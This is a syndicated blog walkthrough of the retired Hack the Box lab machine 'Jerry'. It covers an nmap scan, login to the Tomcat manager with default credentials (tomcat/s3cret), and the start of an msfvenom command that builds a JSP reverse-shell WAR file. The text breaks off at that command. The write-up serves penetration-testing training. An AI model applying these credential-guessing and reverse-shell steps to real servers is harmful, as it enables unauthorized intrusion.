Today, we will be continuing with our series on Hack the Box machine walkthroughs. This article contains a walkthrough for a HTB machine named “Jerry.”
HTB is an excellent platform that hosts machines belonging to multiple OSes. It offers multiple types of challenges as well. The individual can download the VPN pack to connect to the machines hosted on the HTB platform and has to solve the puzzle (simple enumeration plus pentest) in order to log into the platform.
Note: Only writeups of retired HTB machines are allowed. The machine in this article, Jerry, is retired.
Let’s start with this machine.
1. Download the VPN pack for the individual user and use the guidelines to log into the HTB VPN.
2. The Jerry machine is IP is 10.10.10.95.
3. We will adopt the same methodology of performing penetration testing as we’ve used previously. Let’s start with enumeration in order to gain as much information on the machine as possible.
4. We start with an Nmap scan on the machine. [Click the images to enlarge]
<<nmap-sC -sV -A Jeery 10.10.10.95>>
5. We can see that only one port is opened on the machine and Apache Tomcat is running on it.
6. Browsing to that port reveals the startup page of Tomcat.
7. Most of the actions from the page require credentials and hence we are restricted.
8. At this point, we can start to use default creds for Tomcat such as admin/admin, admin/tomcat and tomcat/admin. In this case, the password is tomcat/s3cret.
9. Click on “Manager App” and supply these creds, and the below screen will appear.
10. Since now we are free to deploy war files, let’s generate a war file using msfvenom and save it as reverse.war.
<<msfvenom -p java/jsp_reverse_shell_reverse_tcp (Read more...)
*** This is a Security Bloggers Network syndicated blog from InfoSec Resources authored by Security Ninja. Read the original post at: http://feedproxy.google.com/~r/infosecResources/~3/M37hVJ3BmZ0/